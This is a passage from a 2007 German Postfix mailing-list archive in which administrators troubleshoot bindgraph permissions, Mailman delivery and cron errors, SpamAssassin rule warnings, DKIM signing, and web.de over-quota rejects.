kann, um nicht jedes mal eine neue Verbindung aufzubauen. Die connection solltest du mit ^M bzw CRLF beenden koennen. > Woran liegt das? > > Die andere Sache ist, dass ich zwar mit /etc/init.d/policyd-weight stop Policyd-weight beenden kann, aber dadurch nur der Masterprozess herunterfährt. > Der Cache-Prozess läuft weiterhin. Evtl. waers sinnvoll zwei init scripts zu basteln. Einen, um den master zu kontrollieren, einen, um den cache zu kontrollieren. Normalerweise will man den cache nicht neu starten, wenn doch, dann mit policyd-weight -k -- Robert Felber (PGP: 896CF30B) Munich, Germany From nighthawk at gmail.com Sat Nov 24 13:24:25 2007 From: nighthawk at gmail.com (nighthawk) Date: Sat, 24 Nov 2007 13:24:25 +0100 Subject: [Postfixbuch-users] DKIM und Postfix In-Reply-To: <20071124003639.61ee2675@valentina.brachium-system.net> References: <20071123131950.428218f6@greulix.scheeder.de> <20071123125438.GE29431@charite.de> <20071124003639.61ee2675@valentina.brachium-system.net> Message-ID: <7832fd560711240424v126dc747r21c9f9caaee1df9e@mail.gmail.com> On Nov 24, 2007 12:36 AM, wrote: > Ich teste derzeit Postfix+Milter mit dkim-filter (mode: only_signing) > fuers signing. > > Eine Moeglichkeit waere fuer den Verify waere, mit Spamassassin ueber > das Plugin SpamAssassin::Plugin::DKIM. dkim-filter macht auch verify. In SpamAssassin kann man das z.B. aber zusätzlich auch laufen lassen. From cscholz at 2nibbles4u.de Sat Nov 24 19:34:09 2007 From: cscholz at 2nibbles4u.de (Christian Scholz) Date: Sat, 24 Nov 2007 19:34:09 +0100 Subject: [Postfixbuch-users] wie kriegen ich den bindgraph zum laufen? Message-ID: <63908DA348933441A6FB2AB998ED894F0196DE@dcex01.2nibbles4u.local> Ich versuche schon seit längerem bindgraph bei mir zum laufen zu bekommen. Die Installation mittels apt-get (Debian Etch 4.0) ist nicht lauffähig. Es werden zwar Daten gesammelt, aber die Graphen werden nicht erstellt Kennt jemand eine Anleitung nach der es funktioniert? Gruß Christian Scholz From Ralf.Hildebrandt at charite.de Sat Nov 24 19:36:10 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Sat, 24 Nov 2007 19:36:10 +0100 Subject: [Postfixbuch-users] wie kriegen ich den bindgraph zum laufen? In-Reply-To: <63908DA348933441A6FB2AB998ED894F0196DE@dcex01.2nibbles4u.local> References: <63908DA348933441A6FB2AB998ED894F0196DE@dcex01.2nibbles4u.local> Message-ID: <20071124183610.GT5687@charite.de> * Christian Scholz : > Ich versuche schon seit längerem bindgraph bei mir zum laufen zu bekommen. > Die Installation mittels apt-get (Debian Etch 4.0) ist nicht lauffähig. Es werden zwar Daten gesammelt, aber die Graphen werden nicht erstellt Ich probiere mal, das hier zu installieren. -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de ASCII and ye shall receive. From Ralf.Hildebrandt at charite.de Sat Nov 24 19:58:34 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Sat, 24 Nov 2007 19:58:34 +0100 Subject: [Postfixbuch-users] wie kriegen ich den bindgraph zum laufen? In-Reply-To: <20071124183610.GT5687@charite.de> References: <63908DA348933441A6FB2AB998ED894F0196DE@dcex01.2nibbles4u.local> <20071124183610.GT5687@charite.de> Message-ID: <20071124185834.GU5687@charite.de> * Ralf Hildebrandt : > * Christian Scholz : > > Ich versuche schon seit längerem bindgraph bei mir zum laufen zu bekommen. > > Die Installation mittels apt-get (Debian Etch 4.0) ist nicht lauffähig. Es werden zwar Daten gesammelt, aber die Graphen werden nicht erstellt > > Ich probiere mal, das hier zu installieren. Erster Fehler: [Sat Nov 24 19:46:57 2007] [error] [client 172.28.0.5] RRDs::last(/var/lib/bindgraph/bindgraph.rrd): opening '/var/lib/bindgraph/bindgraph.rrd': No such file or directory at /usr/lib/cgi-bin/bindgraph.cgi line 158., referer: http://opa.charite.de/cgi-bin/bindgraph.cgi [Sat Nov 24 19:46:57 2007] [error] [client 172.28.0.5] Premature end of script headers: bindgraph.cgi, referer: http://opa.charite.de/cgi-bin/bindgraph.cgi Kein Wunder, denn: daemon 8536 0.0 0.6 6772 3156 ? SNs 19:43 0:00 /usr/bin/perl -w /usr/sbin/bindgraph.pl -l /var/log/bind9-query.log --format=bind93 -d --daemon_rrd=/var/lib/bindgraph --rrd_name=bindgraph aber: # ll -d /var/lib/bindgraph/ drwxrwxr-x 2 root adm 4096 May 17 2007 /var/lib/bindgraph/ Deppen. Nach Korrektur der Rechte gings dann. -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de No sig. Move along - nothing to see here. From cscholz at 2nibbles4u.de Sat Nov 24 21:27:23 2007 From: cscholz at 2nibbles4u.de (Christian Scholz) Date: Sat, 24 Nov 2007 21:27:23 +0100 Subject: [Postfixbuch-users] wie kriegen ich den bindgraph zum laufen? In-Reply-To: <20071124185834.GU5687@charite.de> References: <63908DA348933441A6FB2AB998ED894F0196DE@dcex01.2nibbles4u.local><20071124183610.GT5687@charite.de> <20071124185834.GU5687@charite.de> Message-ID: <63908DA348933441A6FB2AB998ED894F0196DF@dcex01.2nibbles4u.local> > > Ich probiere mal, das hier zu installieren. > > Erster Fehler: > > [Sat Nov 24 19:46:57 2007] [error] [client 172.28.0.5] RRDs::last(/var/lib/bindgraph/bindgraph.rrd): opening > '/var/lib/bindgraph/bindgraph.rrd': No such file or directory at /usr/lib/cgi-bin/bindgraph.cgi line 158., referer: > http://opa.charite.de/cgi-bin/bindgraph.cgi > [Sat Nov 24 19:46:57 2007] [error] [client 172.28.0.5] Premature end of script headers: bindgraph.cgi, referer: > http://opa.charite.de/cgi-bin/bindgraph.cgi > > Kein Wunder, denn: > daemon 8536 0.0 0.6 6772 3156 ? SNs 19:43 0:00 > /usr/bin/perl -w /usr/sbin/bindgraph.pl -l /var/log/bind9-query.log > --format=bind93 -d --daemon_rrd=/var/lib/bindgraph --rrd_name=bindgraph > > aber: > # ll -d /var/lib/bindgraph/ > drwxrwxr-x 2 root adm 4096 May 17 2007 /var/lib/bindgraph/ > > Deppen. > Nach Korrektur der Rechte gings dann. > wie müssen die Berechtigungen für /var/lib/bindgraph/ denn sein? Sorry, krieg es nicht hin... entweder kommt Statistics: bindgraph: can't write to /var/lib/bindgraph oder keine Fehlermeldung aber auch kein rrd-file Gruß Christian Scholz From Ralf.Hildebrandt at charite.de Sat Nov 24 22:30:57 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Sat, 24 Nov 2007 22:30:57 +0100 Subject: [Postfixbuch-users] wie kriegen ich den bindgraph zum laufen? In-Reply-To: <63908DA348933441A6FB2AB998ED894F0196DF@dcex01.2nibbles4u.local> References: <20071124185834.GU5687@charite.de> <63908DA348933441A6FB2AB998ED894F0196DF@dcex01.2nibbles4u.local> Message-ID: <20071124213057.GE5687@charite.de> * Christian Scholz : > > Kein Wunder, denn: > > daemon 8536 0.0 0.6 6772 3156 ? SNs 19:43 0:00 > > /usr/bin/perl -w /usr/sbin/bindgraph.pl -l /var/log/bind9-query.log > > --format=bind93 -d --daemon_rrd=/var/lib/bindgraph --rrd_name=bindgraph > > > > aber: > > # ll -d /var/lib/bindgraph/ > > drwxrwxr-x 2 root adm 4096 May 17 2007 /var/lib/bindgraph/ > > > > Deppen. > > Nach Korrektur der Rechte gings dann. > > > > wie müssen die Berechtigungen für /var/lib/bindgraph/ denn sein? > Sorry, krieg es nicht hin... entweder kommt Na es muss "daemon" gehören! -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de I fit in my suit, my suit fits in my suitcase. Hence i fit in my suitcase. From mail at b-schneider.de Sun Nov 25 14:17:19 2007 From: mail at b-schneider.de (Bernhard Schneider) Date: Sun, 25 Nov 2007 14:17:19 +0100 Subject: [Postfixbuch-users] Mailman Sendet nicht Message-ID: Hallo Liste, Ich habe das problem das Mailman aud Suse 10.0 zwar alle E-mails animmt aber diese dann ncicht verteilt Log Eintrag in Mailman Nov 25 16:10:05 box79146 postfix/qmgr[15589]: B47AB25594: from=, size=2746, nrcpt=1 (queue active) Nov 25 16:10:06 box79146 postfix/local[16191]: B47AB25594: to=, relay=local, delay=1, status=sent (delivered to command: /usr/lib/mailman/mail/mailman post kanu-info) Nov 25 16:10:06 box79146 postfix/qmgr[15589]: B47AB25594: removed Nur danach verschwindet die e-mail im Nirvana? Was könnte es sein oder Wo kann ich noch Prüfen Mit freundlichen Grüßen Bernhard -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From mail at b-schneider.de Sun Nov 25 14:06:38 2007 From: mail at b-schneider.de (Bernhard Schneider) Date: Sun, 25 Nov 2007 14:06:38 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?=28kein_Betreff=29?= Message-ID: Hallo Liste Nach dem Update auf Spammassin 3.1.8 auf eine Suse 10.0 System erhalte ich folgende Fehlermeldungen und SA Funktioniert nicht mehr Meine Frage ist was kann ich dagegen tuen Nov 25 15:55:48 box79146 spamd[14844]: rules: meta test DIGEST_MULTIPLE has undefined dependency 'DCC_CHECK' Nov 25 15:55:48 box79146 spamd[14844]: rules: meta test SARE_HEAD_SUBJ_RAND has undefined dependency 'SARE_XMAIL_SUSP2' Nov 25 15:55:48 box79146 spamd[14844]: rules: meta test SARE_HEAD_SUBJ_RAND has undefined dependency 'SARE_HEAD_XAUTH_WARN' Nov 25 15:55:48 box79146 spamd[14844]: rules: meta test SARE_HEAD_SUBJ_RAND has dependency 'X_AUTH_WARN_FAKED' with a zero score Nov 25 15:55:48 box79146 spamd[14844]: rules: meta test SARE_RD_SAFE has undefined dependency 'SARE_RD_SAFE_MKSHRT' Nov 25 15:55:48 box79146 spamd[14844]: rules: meta test SARE_RD_SAFE has undefined dependency 'SARE_RD_SAFE_GT' Nov 25 15:55:48 box79146 spamd[14844]: rules: meta test SARE_RD_SAFE has undefined dependency 'SARE_RD_SAFE_TINY' Nov 25 15:55:48 box79146 spamd[14844]: Use of uninitialized value in numeric ge (>=) at /usr/lib/perl5/5.8.7/i586-linux-thread-multi/DB_File.pm line 275. Nov 25 15:55:48 box79146 spamd[14844]: Use of uninitialized value in numeric gt (>) at /usr/lib/perl5/5.8.7/i586-linux-thread-multi/DB_File.pm line 279. Nov 25 15:55:48 box79146 spamd[14844]: Deep recursion on subroutine "DB_File::AUTOLOAD" at /usr/lib/perl5/5.8.7/i586-linux-thread-multi/DB_File.pm line 234. Mfg Bernhard -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From mailingliste-postfixbuch at pothe.com Sun Nov 25 14:28:21 2007 From: mailingliste-postfixbuch at pothe.com (Andreas Pothe) Date: Sun, 25 Nov 2007 14:28:21 +0100 Subject: [Postfixbuch-users] Mailman Sendet nicht In-Reply-To: References: Message-ID: <003401c82f67$0c68f080$253ad180$@com> Moin, bitte in Plain-Text senden, nicht in HTML. Danke! >Ich habe das problem das Mailman aud Suse 10.0 zwar > alle E-mails animmt aber diese dann ncicht verteilt Vergessen, mailmanctl zu starten? BTW: Suse 10.0 wird seit dieser Woche nicht mehr supportet, d. h. es gibt keine Bugfixes usw. mehr. Somit ist ein Upgrade auf neuere Versionen (oder noch besser: Gleich Debian oder ein anderes *ix) anzuraten. CU Andreas From chris at schoeppi.net Sun Nov 25 14:44:32 2007 From: chris at schoeppi.net (Christian Schoepplein) Date: Sun, 25 Nov 2007 14:44:32 +0100 Subject: [Postfixbuch-users] Mailman Sendet nicht In-Reply-To: References: Message-ID: <20071125134431.GA5883@athlon.schoeppi.net> On So, Nov 25, 2007 at 02:17:19 +0100, Bernhard Schneider wrote: > > >Hallo Liste, > >Ich habe das problem das Mailman aud Suse 10.0 zwar alle E-mails animmt aber >diese dann ncicht verteilt > >Log Eintrag in Mailman > >Nov 25 16:10:05 box79146 postfix/qmgr[15589]: B47AB25594: from=, >size=2746, nrcpt=1 (queue active) >Nov 25 16:10:06 box79146 postfix/local[16191]: B47AB25594: to=, >relay=local, delay=1, status=sent (delivered to command: /usr/lib/mailman/mail/ >mailman post kanu-info) >Nov 25 16:10:06 box79146 postfix/qmgr[15589]: B47AB25594: removed > >Nur danach verschwindet die e-mail im Nirvana? > >Was könnte es sein oder Wo kann ich noch Prüfen Läuft mm überhaupt: # ps aux | grep mailman Wenn nicht, veruch mm mal mit rcmailman start bzw. /etc/init.d/mailman start zu starten. >Bernhard Ciao, Schöpp -- Christian Schoepplein -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : signature.asc Dateityp : application/pgp-signature Dateigröße : 189 bytes Beschreibung: Digital signature URL : From mail at b-schneider.de Sun Nov 25 17:02:20 2007 From: mail at b-schneider.de (Bernhard Schneider) Date: Sun, 25 Nov 2007 17:02:20 +0100 Subject: [Postfixbuch-users] Mailman Sendet nicht In-Reply-To: <20071125134431.GA5883@athlon.schoeppi.net> References: <20071125134431.GA5883@athlon.schoeppi.net> Message-ID: -----Ursprüngliche Nachricht----- Von: postfixbuch-users-bounces at listi.jpberlin.de [mailto:postfixbuch-users-bounces at listi.jpberlin.de] Im Auftrag von Christian Schoepplein Gesendet: Sonntag, 25. November 2007 14:45 An: Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein. Betreff: Re: [Postfixbuch-users] Mailman Sendet nicht On So, Nov 25, 2007 at 02:17:19 +0100, Bernhard Schneider wrote: > > >Hallo Liste, > >Ich habe das problem das Mailman aud Suse 10.0 zwar alle E-mails >animmt aber diese dann ncicht verteilt > >Log Eintrag in Mailman > >Nov 25 16:10:05 box79146 postfix/qmgr[15589]: B47AB25594: >from=, size=2746, nrcpt=1 (queue active) Nov 25 16:10:06 >box79146 postfix/local[16191]: B47AB25594: to=, >relay=local, delay=1, status=sent (delivered to command: >/usr/lib/mailman/mail/ mailman post kanu-info) Nov 25 16:10:06 box79146 >postfix/qmgr[15589]: B47AB25594: removed > >Nur danach verschwindet die e-mail im Nirvana? > >Was könnte es sein oder Wo kann ich noch Prüfen Läuft mm überhaupt: # ps aux | grep mailman Wenn nicht, veruch mm mal mit rcmailman start bzw. /etc/init.d/mailman start zu starten. >Bernhard Status von mailman ist running, From mail at b-schneider.de Sun Nov 25 17:38:51 2007 From: mail at b-schneider.de (Bernhard Schneider) Date: Sun, 25 Nov 2007 17:38:51 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mailman_Sendet_nicht_erg=E4nzu?= =?iso-8859-1?q?g_nur_Opt_in_Mails_werden_nicht_versand?= In-Reply-To: References: <20071125134431.GA5883@athlon.schoeppi.net> Message-ID: Hallo Liste, ich habe den fehler schon soweit eigegrenzt das ich aussagen kann das der Opt in in Mailmann nicht funktioniert wenn cih die Adressen händisch eintrage funktioniert die kommun ikation ? Worann kann es liegen das der Opt in nicht geht? Danke im Voraus Bernhard From postfixbuch at cboltz.de Sun Nov 25 21:58:06 2007 From: postfixbuch at cboltz.de (Christian Boltz) Date: Sun, 25 Nov 2007 21:58:06 +0100 Subject: [Postfixbuch-users] web.de overquota queuen? Message-ID: <200711252158.07148@tux.boltz.de.vu> Hallo Leute, web.de macht bei vollen Postfächern einen harten 550er REJECT: <... at web.de>: host mx-ha01.web.de[217.72.192.149] said: 550 <... at web.de> Benutzer hat das Speichervolumen ueberschritten. / User has exhausted allowed storage space. (in reply to RCPT TO command) Gibt es eine Möglichkeit, auf Seite von Postfix diese Meldung als 4xx zu interpretieren und damit zu queuen, ohne sonstige Reject-Gründe (user unknown usw.) auf 4xx zu ändern? Idealerweise sollte das Ganze pro Empfängerdomain einstellbar sein ;-) Irgendwelche Ideen? Gruß Christian Boltz -- Aber bei Sendmail weiss man ja nie, ist ja ne Mischung aus Programmier- sprache und halben Betriebssystem, die bei geeigneter Konfiguration wie ein MTA aussehen kann... [Steffen Dettmer in suse-linux] From cscholz at 2nibbles4u.de Mon Nov 26 01:01:49 2007 From: cscholz at 2nibbles4u.de (Christian Scholz) Date: Mon, 26 Nov 2007 01:01:49 +0100 Subject: [Postfixbuch-users] wie kriegen ich den bindgraph zum laufen? In-Reply-To: <20071124213057.GE5687@charite.de> References: <20071124185834.GU5687@charite.de><63908DA348933441A6FB2AB998ED894F0196DF@dcex01.2nibbles4u.local> <20071124213057.GE5687@charite.de> Message-ID: <63908DA348933441A6FB2AB998ED894F065E01@dcex01.2nibbles4u.local> > > > Kein Wunder, denn: > > > daemon 8536 0.0 0.6 6772 3156 ? SNs 19:43 0:00 > > > /usr/bin/perl -w /usr/sbin/bindgraph.pl -l /var/log/bind9-query.log > > > --format=bind93 -d --daemon_rrd=/var/lib/bindgraph --rrd_name=bindgraph > > > > > > aber: > > > # ll -d /var/lib/bindgraph/ > > > drwxrwxr-x 2 root adm 4096 May 17 2007 /var/lib/bindgraph/ > > > > > > Deppen. > > > Nach Korrektur der Rechte gings dann. > > > > > > > wie müssen die Berechtigungen für /var/lib/bindgraph/ denn sein? > > Sorry, krieg es nicht hin... entweder kommt > > Na es muss "daemon" gehören! Danke. Ich hab den Fehler gefunden. Nachdem ich in der /usr/lib/cgi-bin/bindgraph.cgi die Zeilen 108, 109 & 110 auskommentiert hatte, ging es.... @rrdef, @rrprint, ## 'COMMENT:\s', ## 'COMMENT:last update: ' . localtime(last_update($rrd)) ## . ' graph created on ' . localtime(time) . '\r', ); Gruß Christian Scholz From jonny.oschaetzky at wittcom.de Mon Nov 26 08:04:45 2007 From: jonny.oschaetzky at wittcom.de (=?ISO-8859-1?Q?Jonny_Osch=E4tzky?=) Date: Mon, 26 Nov 2007 08:04:45 +0100 Subject: [Postfixbuch-users] wie kriegen ich den bindgraph zum laufen? In-Reply-To: <63908DA348933441A6FB2AB998ED894F065E01@dcex01.2nibbles4u.local> References: <20071124185834.GU5687@charite.de><63908DA348933441A6FB2AB998ED894F0196DF@dcex01.2nibbles4u.local> <20071124213057.GE5687@charite.de> <63908DA348933441A6FB2AB998ED894F065E01@dcex01.2nibbles4u.local> Message-ID: <474A700D.7010307@wittcom.de> > Danke. Ich hab den Fehler gefunden. Nachdem ich in der /usr/lib/cgi-bin/bindgraph.cgi die Zeilen 108, 109 & 110 auskommentiert hatte, ging es.... > > @rrdef, > @rrprint, > ## 'COMMENT:\s', > ## 'COMMENT:last update: ' . localtime(last_update($rrd)) > ## . ' graph created on ' . localtime(time) . '\r', > ); Und du bist dir ganz sicher, dass das Auskommentieren dieser 3 Zeilen das Problem gelöst hat? Meines Erachtens hat das 0,nix mit dem Eigentlichen Problem (den Zugriffsrechten) zu tun. Gruß Jonny From cscholz at 2nibbles4u.de Mon Nov 26 08:33:37 2007 From: cscholz at 2nibbles4u.de (Christian Scholz) Date: Mon, 26 Nov 2007 08:33:37 +0100 Subject: [Postfixbuch-users] wie kriegen ich den bindgraph zum laufen? In-Reply-To: <474A700D.7010307@wittcom.de> References: <20071124185834.GU5687@charite.de><63908DA348933441A6FB2AB998ED894F0196DF@dcex01.2nibbles4u.local> <20071124213057.GE5687@charite.de><63908DA348933441A6FB2AB998ED894F065E01@dcex01.2nibbles4u.local> <474A700D.7010307@wittcom.de> Message-ID: <63908DA348933441A6FB2AB998ED894F065E02@dcex01.2nibbles4u.local> >> >> @rrdef, >> @rrprint, >> ## 'COMMENT:\s', >> ## 'COMMENT:last update: ' . localtime(last_update($rrd)) >> ## . ' graph created on ' . localtime(time) . '\r', >> ); > >Und du bist dir ganz sicher, dass das Auskommentieren dieser 3 Zeilen >das Problem gelöst hat? > >Meines Erachtens hat das 0,nix mit dem Eigentlichen Problem (den >Zugriffsrechten) zu tun. > >Gruß >Jonny Jep, bin ich ;-) Wenn die Zeilen nicht auskommentiert sind und ich den Pfad zu einem png direkt aufrufe kommt folgende Meldung: ERROR: RRDs::graph(/var/cache/bindgraph/,bindgraph.cgi/bindgraph_0.png.tmp, ...): Garbage ': Mon Nov 26 08:15:00 2007 graph created on Mon Nov 26 08:17:44 2007\r' after command: COMMENT:last update: Mon Nov 26 08:15:00 2007 graph created on Mon Nov 26 08:17:44 2007\r Gruß Christian From Ralf.Hildebrandt at charite.de Mon Nov 26 09:54:36 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Mon, 26 Nov 2007 09:54:36 +0100 Subject: [Postfixbuch-users] web.de overquota queuen? In-Reply-To: <200711252158.07148@tux.boltz.de.vu> References: <200711252158.07148@tux.boltz.de.vu> Message-ID: <20071126085436.GG5982@charite.de> * Christian Boltz : > Hallo Leute, > > web.de macht bei vollen Postfächern einen harten 550er REJECT: > > <... at web.de>: host mx-ha01.web.de[217.72.192.149] said: 550 > <... at web.de> Benutzer hat das Speichervolumen ueberschritten. / User > has exhausted allowed storage space. (in reply to RCPT TO command) > > Gibt es eine Möglichkeit, auf Seite von Postfix diese Meldung als 4xx zu > interpretieren und damit zu queuen, ohne sonstige Reject-Gründe (user > unknown usw.) auf 4xx zu ändern? Idealerweise sollte das Ganze pro > Empfängerdomain einstellbar sein ;-) Nee, geht nicht -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de "I'm not under the alcofluence of inkahol that some thinkle peep I am. It's just the drunker I sit here the longer I get." From mail at b-schneider.de Mon Nov 26 10:17:15 2007 From: mail at b-schneider.de (mail at b-schneider.de) Date: Mon, 26 Nov 2007 10:17:15 +0100 Subject: [Postfixbuch-users] Mailman Fehler Cron/usr/bin/python -S /usr/lib/mailman/cron/disabled Message-ID: <000101c8300d$235e9b90$def3fea9@skanwood.local> Hallo Liste, Eine Frage was will mir diese Fehlermeldung Sagen welche Operation ist warum nicht erlaubt? Traceback (most recent call last): File "/usr/lib/mailman/cron/disabled", line 220, in ? main() File "/usr/lib/mailman/cron/disabled", line 213, in main mlist.Save() File "/usr/lib/mailman/Mailman/MailList.py", line 557, in Save self.__save(dict) File "/usr/lib/mailman/Mailman/MailList.py", line 529, in __save os.unlink(fname_last) OSError: [Errno 1] Operation not permitted: '/var/lib/mailman/lists/ipsc-generell/config.pck.last' Traceback (most recent call last): File "/usr/lib/mailman/cron/senddigests", line 94, in ? main() File "/usr/lib/mailman/cron/senddigests", line 87, in main mlist.Save() File "/usr/lib/mailman/Mailman/MailList.py", line 557, in Save self.__save(dict) File "/usr/lib/mailman/Mailman/MailList.py", line 529, in __save os.unlink(fname_last) OSError: [Errno 1] Operation not permitted: '/var/lib/mailman/lists/ipsc-generell/config.pck.last' Danke im Voraus Bernhard From mluser at rbmail.ch Mon Nov 26 10:43:39 2007 From: mluser at rbmail.ch (Andre Keller) Date: Mon, 26 Nov 2007 10:43:39 +0100 Subject: [Postfixbuch-users] Mailman Fehler Cron/usr/bin/python -S /usr/lib/mailman/cron/disabled In-Reply-To: <000101c8300d$235e9b90$def3fea9@skanwood.local> References: <000101c8300d$235e9b90$def3fea9@skanwood.local> Message-ID: <474A954B.3050703@rbmail.ch> > Eine Frage was will mir diese Fehlermeldung Sagen welche Operation ist warum > nicht erlaubt? > > > OSError: [Errno 1] Operation not permitted: > '/var/lib/mailman/lists/ipsc-generell/config.pck.last' > > OSError: [Errno 1] Operation not permitted: > '/var/lib/mailman/lists/ipsc-generell/config.pck.last' > Ich tippe mal auf AppArmor oder SELinux... Hast du da was aktiv? Gruss André From ast-postfix at treibsand.com Mon Nov 26 10:46:34 2007 From: ast-postfix at treibsand.com (Axel Steiner) Date: Mon, 26 Nov 2007 10:46:34 +0100 Subject: [Postfixbuch-users] Mailman Fehler Cron/usr/bin/python -S /usr/lib/mailman/cron/disabled In-Reply-To: <000101c8300d$235e9b90$def3fea9@skanwood.local> References: <000101c8300d$235e9b90$def3fea9@skanwood.local> Message-ID: Hi, > Eine Frage was will mir diese Fehlermeldung Sagen welche Operation > ist warum > nicht erlaubt? > > > Traceback (most recent call last): > File "/usr/lib/mailman/cron/disabled", line 220, in ? > main() > File "/usr/lib/mailman/cron/disabled", line 213, in main > mlist.Save() > File "/usr/lib/mailman/Mailman/MailList.py", line 557, in Save > self.__save(dict) > File "/usr/lib/mailman/Mailman/MailList.py", line 529, in __save > os.unlink(fname_last) > OSError: [Errno 1] Operation not permitted: > '/var/lib/mailman/lists/ipsc-generell/config.pck.last' > > Traceback (most recent call last): > File "/usr/lib/mailman/cron/senddigests", line 94, in ? > main() > File "/usr/lib/mailman/cron/senddigests", line 87, in main > mlist.Save() > File "/usr/lib/mailman/Mailman/MailList.py", line 557, in Save > self.__save(dict) > File "/usr/lib/mailman/Mailman/MailList.py", line 529, in __save > os.unlink(fname_last) > OSError: [Errno 1] Operation not permitted: > '/var/lib/mailman/lists/ipsc-generell/config.pck.last' > Python kann die Datei /var/lib/mailman/lists/ipsc-generell/ config.pck.last nicht lesen. Gehört die Datei dem Mailman Benutzer? Sie sollte dem Benutzer/Gruppe gehören, welche in mm_cfg.py unter MAILMAN_UID bzw. MAILMAN_GID eingetragen ist. Bye, Axel From mluser at rbmail.ch Mon Nov 26 11:21:58 2007 From: mluser at rbmail.ch (Andre Keller) Date: Mon, 26 Nov 2007 11:21:58 +0100 Subject: [Postfixbuch-users] Mailman Fehler Cron/usr/bin/python -S /usr/lib/mailman/cron/disabled In-Reply-To: References: <000101c8300d$235e9b90$def3fea9@skanwood.local> Message-ID: <474A9E46.2050305@rbmail.ch> > Python kann die Datei /var/lib/mailman/lists/ipsc-generell/ > config.pck.last nicht lesen. > Gehört die Datei dem Mailman Benutzer? Sie sollte dem Benutzer/Gruppe > gehören, > welche in mm_cfg.py unter MAILMAN_UID bzw. MAILMAN_GID eingetragen ist. > Müsste in diesem Fall die Meldung nicht Permission denied heissen? From sven at root2.schroederhost.de Mon Nov 26 11:41:07 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Mon, 26 Nov 2007 11:41:07 +0100 Subject: [Postfixbuch-users] Mailman / loops back to myself Message-ID: <474AA2C3.7090105@root2.schroederhost.de> Hallo! Ich hab Mailman nach der Anleitung in /postfix-to-mailman.py installiert und einen Transport eingerichtet. Leider wirft das Fehler raus: mail for lists1.server.de loops back to myself Wo muss man da noch schrauben? From chris at schoeppi.net Mon Nov 26 11:56:29 2007 From: chris at schoeppi.net (Christian Schoepplein) Date: Mon, 26 Nov 2007 11:56:29 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mailman_Sendet_nicht_erg=E4nzu?= =?iso-8859-1?q?g_nur_Opt_in_Mails_werden_nicht_versand?= In-Reply-To: References: <20071125134431.GA5883@athlon.schoeppi.net> Message-ID: <20071126105628.GA552@athlon.schoeppi.net> On So, Nov 25, 2007 at 05:38:51 +0100, Bernhard Schneider wrote: >ich habe den fehler schon soweit eigegrenzt das ich aussagen kann das der >Opt in in Mailmann nicht funktioniert wenn cih die Adressen händisch >eintrage funktioniert die kommun ikation ? Was heißt das genau? Mails die an listenname-subscribe at domain.tld gehen kommen nie bei mailman an und Mailadressen, die du händisch übers Webinterface einträgst, werden subscribed, also auch eine Bestätigungsnachricht verschickt? Versendet mailman nun Nachrichten oder nicht? Was sagen die Logs, also postfix und auch mailman? Und siehst du laufende mailman Prozesse, wenn du mit ps aux | grep mailman nachsiehst? Auf den Statuscheck des init-Skriptes würde ich mich nicht wirklich verlassen.... Schöpp -- Christian Schoepplein -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : signature.asc Dateityp : application/pgp-signature Dateigröße : 189 bytes Beschreibung: Digital signature URL : From chris at schoeppi.net Mon Nov 26 12:05:40 2007 From: chris at schoeppi.net (Christian Schoepplein) Date: Mon, 26 Nov 2007 12:05:40 +0100 Subject: [Postfixbuch-users] Mailman Fehler Cron/usr/bin/python -S /usr/lib/mailman/cron/disabled In-Reply-To: References: <000101c8300d$235e9b90$def3fea9@skanwood.local> Message-ID: <20071126110540.GB552@athlon.schoeppi.net> On Mo, Nov 26, 2007 at 10:46:34 +0100, Axel Steiner wrote: >> Eine Frage was will mir diese Fehlermeldung Sagen welche Operation >> ist warum >> nicht erlaubt? >> >> >> Traceback (most recent call last): >> File "/usr/lib/mailman/cron/disabled", line 220, in ? >> main() >> File "/usr/lib/mailman/cron/disabled", line 213, in main >> mlist.Save() >> File "/usr/lib/mailman/Mailman/MailList.py", line 557, in Save >> self.__save(dict) >> File "/usr/lib/mailman/Mailman/MailList.py", line 529, in __save >> os.unlink(fname_last) >> OSError: [Errno 1] Operation not permitted: >> '/var/lib/mailman/lists/ipsc-generell/config.pck.last' >> >> Traceback (most recent call last): >> File "/usr/lib/mailman/cron/senddigests", line 94, in ? >> main() >> File "/usr/lib/mailman/cron/senddigests", line 87, in main >> mlist.Save() >> File "/usr/lib/mailman/Mailman/MailList.py", line 557, in Save >> self.__save(dict) >> File "/usr/lib/mailman/Mailman/MailList.py", line 529, in __save >> os.unlink(fname_last) >> OSError: [Errno 1] Operation not permitted: >> '/var/lib/mailman/lists/ipsc-generell/config.pck.last' >> > >Python kann die Datei /var/lib/mailman/lists/ipsc-generell/ >config.pck.last nicht lesen. IMHO kann er sie nicht löschen, wg. dem unlink in der Fehlermeldung. Oder seh ich das falsch? >Axel Schöpp -- Christian Schoepplein -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : signature.asc Dateityp : application/pgp-signature Dateigröße : 189 bytes Beschreibung: Digital signature URL : From mail at b-schneider.de Mon Nov 26 12:01:18 2007 From: mail at b-schneider.de (mail at b-schneider.de) Date: Mon, 26 Nov 